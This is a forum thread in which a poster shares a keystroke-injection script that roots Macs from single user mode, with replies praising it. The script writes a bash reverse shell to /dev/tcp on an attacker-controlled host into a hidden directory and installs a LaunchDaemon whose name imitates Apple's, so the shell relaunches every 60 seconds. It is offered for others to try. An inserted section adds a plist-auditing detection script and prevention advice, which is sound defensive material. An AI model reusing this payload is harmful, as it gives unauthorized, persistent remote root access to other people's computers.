mosca1337 Posted April 18, 2013

Hey everyone! I wrote a quick and dirty script that'll root Macs from single user mode. There are practically no defenses to this besides full disk encryption. I challenge you to try it out if you have free time. You won't be disappointed. Grab the payload here. Also, I wrote a quick tutorial that describes the ins and outs of the attack here. (site is new and heavily under construction lol)

REM Patrick Mosca
REM A simple script for rooting OSX from single user mode.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
REM Single user mode mounts / read-only; remount it read-write
STRING mount -uw /
ENTER
DELAY 2000
REM Drop the reverse shell into a hidden directory
STRING mkdir /Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 200
REM Persist as a LaunchDaemon that runs at boot and every 60 seconds
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500
STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 1000
STRING shutdown -h now
ENTER
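The payload above leaves two artifacts a defender can look for: a LaunchDaemon whose label imitates Apple's reverse-DNS naming (com.apples.services rather than com.apple.*) and a program path under a hidden directory (/Library/.hidden). The following POSIX shell script is an added example, not part of the original post or of the linked payload. It audits a directory of XML plists for exactly those two traits and runs against constructed sample files; the plist layout (each key and its value on separate lines) is assumed to match what the payload writes, and the sample plists and the com.example.backup daemon are made up for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): audit a LaunchDaemons-style
# directory for the traits the payload above leaves behind.
# Assumptions: plists are in the plain XML form the payload writes (binary
# plists on a real Mac need `plutil -convert xml1 -o - FILE` first), and a
# <key> and its value sit on separate lines, as they do in the payload.

# Print the first <string> value following <key>$2</key> in plist $1.
plist_value() {  # $1 = file, $2 = key name
    awk -v key="<key>$2</key>" '
        index($0, key) { want = 1; next }
        want && match($0, /<string>[^<]*<\/string>/) {
            print substr($0, RSTART + 8, RLENGTH - 17); exit
        }' "$1"
}

# Print every <string> inside the ProgramArguments <array>, one per line.
program_arguments() {  # $1 = file
    awk '
        /<key>ProgramArguments<\/key>/ { inargs = 1; next }
        inargs && /<\/array>/ { exit }
        inargs && match($0, /<string>[^<]*<\/string>/) {
            print substr($0, RSTART + 8, RLENGTH - 17)
        }' "$1"
}

# Print "label reason" for each suspicious trait found in plist $1.
audit_plist() {  # $1 = file
    label=$(plist_value "$1" Label)
    case "$label" in
        com.apple.*) ;;                                     # Apple's own namespace
        com.apple*)  printf '%s %s\n' "$label" "label-mimics-apple" ;;
    esac
    # Any path component starting with '.' (e.g. /Library/.hidden/...) is flagged.
    program_arguments "$1" | while IFS= read -r arg; do
        case "$arg" in
            */.*) printf '%s %s\n' "$label" "hidden-path:$arg" ;;
        esac
    done
}

# Audit every *.plist in directory $1 (on a Mac: /Library/LaunchDaemons).
audit_dir() {  # $1 = directory
    for f in "$1"/*.plist; do
        [ -f "$f" ] || continue
        audit_plist "$f"
    done
}

# Constructed sample input: one plist mirroring the payload, one benign daemon
# (com.example.backup is a made-up name for this demonstration).
make_samples() {  # $1 = directory to populate
    mkdir -p "$1"
    cat > "$1/com.apples.services.plist" <<'EOF'
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>/Library/.hidden/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>60</integer>
</dict>
</plist>
EOF
    cat > "$1/com.example.backup.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.example.backup</string>
    <key>ProgramArguments</key>
    <array>
        <string>/usr/local/bin/backup</string>
        <string>--nightly</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
EOF
}

# Stand-alone run: audit the constructed samples and print the two flagged lines.
main() {
    dir=$(mktemp -d)
    make_samples "$dir"
    audit_dir "$dir"
    rm -rf "$dir"
}

main
```

Both checks are heuristics: a real attacker can pick a label inside the com.apple.* namespace and a non-hidden path, so in practice you would also compare the ProgramArguments binary against a known-good inventory of /Library/LaunchDaemons. As prevention goes beyond detection, FileVault (the author's own point) keeps the attacker from writing to the volume at all, and an EFI firmware password blocks the Cmd-S startup key combination that gets you into single user mode in the first place.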
kmichael500 Posted April 19, 2013

This is awesome! It works very well. Thanks for sharing this.

mosca1337 Posted April 19, 2013

I had a lot of fun making it. Glad you like it!

mosca1337 Posted January 12, 2014

If I remember correctly, I think I tried something similar to this. I believe that once you catch the reverse shell and then close the session, the script is killed. Then you may not ever receive another reverse shell.